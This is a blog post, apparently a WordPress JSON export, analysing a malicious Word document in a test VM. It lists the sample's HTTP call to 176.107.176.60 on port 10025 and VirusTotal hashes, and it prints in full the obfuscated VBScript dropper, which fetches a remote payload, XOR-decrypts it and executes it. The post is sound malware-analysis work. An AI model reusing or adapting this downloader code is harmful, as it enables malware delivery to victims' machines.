{"id":298,"date":"2015-12-20T16:45:20","date_gmt":"2015-12-20T16:45:20","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=298"},"modified":"2016-02-23T21:55:13","modified_gmt":"2016-02-23T21:55:13","slug":"damn-malicious-word-docs-part-2","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=298","title":{"rendered":"Damn Malicious Word docs &#8211; Part 2"},"content":{"rendered":"<p>So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time &#8211; most likely since the compromised server is no longer up\/has been fixed. But here is the little bit that I got from running the word doc.<\/p>\n<p>After running the malicious word doc within my test VM, I could see a call being made to an IP address of 176.107.176.60 on port 10025. Since it has been a while since this email was received, the compromised server has most likely been taken offline or fixed since there is no response as we can see in the PCAP:<\/p>\n<div id=\"attachment_299\" style=\"width: 2160px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/No-response.png\" rel=\"attachment wp-att-299\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-299\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/No-response.png\" alt=\"Wireshark - No response from server\" width=\"2150\" height=\"338\" class=\"size-full wp-image-299\" style=\"padding:1px;border:thin solid black\" \/><\/a><p id=\"caption-attachment-299\" class=\"wp-caption-text\">Wireshark &#8211; No response from server<\/p><\/div>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/1.jpg HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: 
Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\tHost: 176.107.176.60:10025\r\n\tProxy-Connection: Keep-Alive\r\n\t<\/pre>\n<p>VirusTotal does show a record for this particular IP address as seen below:<\/p>\n<p>\tVirusTotal: <a href=\"http:\/\/www.virustotal.com\/en\/url\/63e556c39ffdf106335aed96e9cc8c26ee29cf8f47a5ecbd64727b53fbe6ced7\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/63e556c39ffdf106335aed96e9cc8c26ee29cf8f47a5ecbd64727b53fbe6ced7\/analysis\/<\/a><br \/>\n\tDetection ratio: 3 \/ 66<br \/>\n\tFirst Submission: 2015-12-15 13:04:13 UTC<\/p>\n<p>It also looks like it creates a new VBS file within the &#8220;C:\\Users\\Administrator\\AppData\\Roaming&#8221; folder called &#8220;14997.vbs&#8221;. VirusTotal did not have this listed in its database, unfortunately. Here are those results from when I uploaded the file to VT:<\/p>\n<p>\tMD5: 3b4914287915f961ccc6e3b6eb2631c8<br \/>\n\tSHA256: d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40<br \/>\n\tFile size: 3.4KB<br \/>\n\tVirusTotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40\/analysis\/1450624617\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40\/analysis\/1450624617\/<\/a><br \/>\n\tFirst Submission: 2015-12-20 15:16:57 UTC<br \/>\n\tDetection ratio: 5 \/ 55<\/p>\n<p>Here is the script as well:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tDim UmjIXO2hir, KiaB14or7AP4MJs3N\r\n\tsub RvzNM87uD2Uk()\r\n\tDim Q8eF5tz, J1osO1Xdjhm\r\n\tFor Q8eF5tz = 21 To 2000369\r\n\tJ1osO1Xdjhm = AQ1rj2btk + 51 + 84 + 86\r\n\tNext\r\n\tEnd Sub\r\n\tFunction 
PW6zO9Wi2(ImpHrHkWLHm,JG8Z4Kmn2,JFc2vrhu0ju)\r\n\tDim L0A9lV2qvBLzt7I, XZSFk9ykDjRgHCE, DJrH, YxusiNzWR8z, LX9kL, SaZkf()\r\n\tSet XZSFk9ykDjRgHCE = CreateObject(P7aXJwQhP(&quot;3A05420047331E5F264720590552140E42350C0B7F0B5D221445&quot;, &quot;Aif0i7Gw1&quot;))\r\n\tSet DJrH = XZSFk9ykDjRgHCE.GEtFILE(ImpHrHkWLHm)\r\n\tSet LX9kL = DJrH.oPeNastExtStreaM(1, 0)\r\n\tSet YxusiNzWR8z = XZSFk9ykDjRgHCE.CreAtETEXtfiLe(JG8Z4Kmn2, 1, 0)\r\n\tL0A9lV2qvBLzt7I = 0\r\n\tReDim SaZkf(Len(JFc2vrhu0ju) - 1)\r\n\tFor L0A9lV2qvBLzt7I = 0 To UBound(SaZkf)\r\n\tSaZkf(L0A9lV2qvBLzt7I) = Asc(Mid(JFc2vrhu0ju, L0A9lV2qvBLzt7I + 1, 1))\r\n\tNext\r\n\tDo Until LX9kL.aTeNDOFStREAM\r\n\tL0A9lV2qvBLzt7I = (L0A9lV2qvBLzt7I + 1) \\ (UBound(SaZkf) + 1)\r\n\tYxusiNzWR8z.WrIte chr(Asc(LX9kL.REAd(1)) Xor SaZkf(L0A9lV2qvBLzt7I))\r\n\tLoop\r\n\tYxusiNzWR8z.Close\r\n\tLX9kL.Close\r\n\tSet LX9kL = Nothing\r\n\tSet DJrH = Nothing\r\n\tSet YxusiNzWR8z = Nothing\r\n\tSet XZSFk9ykDjRgHCE = Nothing\r\n\tEnd Function\r\n\tSub Olep7i7Kiur(MAyxtrNPneQ2NWZ7k)\r\n\tDim ClPZ\r\n\tClPZ = Timer + MAyxtrNPneQ2NWZ7k\r\n\tDo While Timer &lt; ClPZ\r\n\tLoop\r\n\tEnd Sub\r\n\tSub RcEJWSKV4kbbHw()\r\n\tDim SMb0MjiAHbCa7ncac, NHgJOxl2hir\r\n\tSet SMb0MjiAHbCa7ncac = CreateObject(P7aXJwQhP(&quot;061524202D33186A1E0704353D&quot;, &quot;YQFGRDClDMoa&quot;))\r\n\tRvzNM87uD2Uk\r\n\tNGhXERANM = WscRIpT.sCriPtNAME\r\n\tNGhXERANM = Left(NGhXERANM, Len(NGhXERANM) - (2 + 7 + 2 - 7))\r\n\tUmjIXO2hir = SMb0MjiAHbCa7ncac.EXpAndENViRonmENtstRINGS(P7aXJwQhP(&quot;5024222503500C1661&quot;, &quot;GuERUg1xwD&quot;)) &amp; &quot;\\&quot; &amp; NGhXERANM\r\n\tSet NHgJOxl2hir = CreateObject(P7aXJwQhP(&quot;22312A1D373A003E3D41000423101D3B08&quot;, &quot;IoX&quot;))\r\n\tNHgJOxl2hir.oPEn P7aXJwQhP(&quot;2E1363&quot;, &quot;FiV704uNs05DkXL&quot;), P7aXJwQhP(&quot;3D3B3B03737A607E447F7B7E7F44676478795D7F65757E4379677A6042673F3F28&quot;, &quot;IUOOs&quot;), 0\r\n\tNHgJOxl2hir.SEnD()\r\n\tif NHgJOxl2hir.reADYSTAtE = (2 + 5 + 2 - 5) and 
NHgJOxl2hir.statuS = (100 + 1 + 100 - 1) then\r\n\tRvzNM87uD2Uk\r\n\tA9EyFbvfiiPnu NHgJOxl2hir.ReSPONSEBoDy\r\n\tend if\r\n\tEnd Sub\r\n\tPxhu5jG3sVJvW\r\n\tFunction P7aXJwQhP(GicLFzK4z, WuDVCowp4c)\r\n\tDim KED4i4J41QJIrnYE, XCUpD, QbspWznb91\r\n\tFor KED4i4J41QJIrnYE = 1 To (Len(GicLFzK4z) \/ 2)\r\n\tXCUpD = (Chr(38) &amp; Chr(72) &amp; (Mid(GicLFzK4z, (KED4i4J41QJIrnYE + KED4i4J41QJIrnYE) - 1, 2)))\r\n\tQbspWznb91 = (Asc(Mid(WuDVCowp4c, ((KED4i4J41QJIrnYE Mod Len(WuDVCowp4c)) + 1), 1)))\r\n\tP7aXJwQhP = P7aXJwQhP + chr(XCUpD Xor QbspWznb91)\r\n\tNext\r\n\tEnd Function\r\n\tsub Pxhu5jG3sVJvW()\r\n\tDim DOPo6yeQIQ0KMjs, PsGNJpm5ejbM, TlscH7mFdrkHWvBFz\r\n\tDOPo6yeQIQ0KMjs = 91255263: PsGNJpm5ejbM = 0: TlscH7mFdrkHWvBFz = 0\r\n\tFor PsGNJpm5ejbM = 1 To DOPo6yeQIQ0KMjs\r\n\tTlscH7mFdrkHWvBFz = TlscH7mFdrkHWvBFz + 1\r\n\tNext\r\n\tIf TlscH7mFdrkHWvBFz = DOPo6yeQIQ0KMjs Then\r\n\tOlep7i7Kiur (4)\r\n\tRcEJWSKV4kbbHw\r\n\tXAwnfxrYiA4\r\n\tElse\r\n\tMsgBox &quot;87&quot;, 16, &quot;17&quot;\r\n\tEnd If\r\n\tEnd Sub\r\n\tSub A9EyFbvfiiPnu(YHT33KI3x4xVelz7)\r\n\tDim Su8OPyfzt4Ku45ua\r\n\tSet Su8OPyfzt4Ku45ua = CreateObject(P7aXJwQhP(&quot;120738740C6F6102370C2621&quot;, &quot;TSCw0NA2vEiGLd&quot;))\r\n\tSu8OPyfzt4Ku45ua.opEn\r\n\tSu8OPyfzt4Ku45ua.tYpE = 1\r\n\tSu8OPyfzt4Ku45ua.WRITe YHT33KI3x4xVelz7\r\n\tSu8OPyfzt4Ku45ua.SAVEToFilE UmjIXO2hir, (1 + 5 + 1 - 5)\r\n\tSu8OPyfzt4Ku45ua.Close\r\n\tOlep7i7Kiur (2)\r\n\tKiaB14or7AP4MJs3N = UmjIXO2hir\r\n\tUmjIXO2hir = UmjIXO2hir &amp; second(time) &amp; P7aXJwQhP(&quot;57521501&quot;, &quot;Qy7md1eKE5CxqP&quot;)\r\n\tPW6zO9Wi2 KiaB14or7AP4MJs3N, UmjIXO2hir, P7aXJwQhP(&quot;355100765445&quot;, &quot;UT3cGfvjM4&quot;)\r\n\tEnd Sub\r\n\tSub XAwnfxrYiA4()\r\n\tCreateObject(P7aXJwQhP(&quot;60240C2A0769723C192A02245238002905&quot;, &quot;G3LiFk&quot;)).sHELLexECUte UmjIXO2hir, &quot;&quot;, &quot;&quot;, P7aXJwQhP(&quot;1A43520F&quot;, &quot;Nu37aPdZsl&quot;), 1\r\n\tEnd sub\r\n\t<\/pre>\n<p>I have also gotten a video of the VM when I 
started running the malicious Word document which <a href=\"http:\/\/www.youtube.com\/watch?v=kPZM5hAbSmE\" target=\"_blank\">you can watch here<\/a>. The interesting thing about the Word doc is that the script that it creates in the Appdata\/Roaming folder has different names when you run it. I noticed this when messing around with VirtualBox and trying to get the video recording setup correctly. The name of the file always changed, but the error that it gave, and the IP\/port combination that it tried to contact always stayed the same.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time &#8211; most likely since the compromised server is no longer up\/has been fixed. But here is the little bit that I got from running the word doc. After running the malicious word doc within my test VM, I could see a call being made to an IP address of&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=298\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> 
<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-298","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=298"}],"version-history":[{"count":1,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298\/revisions"}],"predecessor-version":[{"id":300,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298\/revisions\/300"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}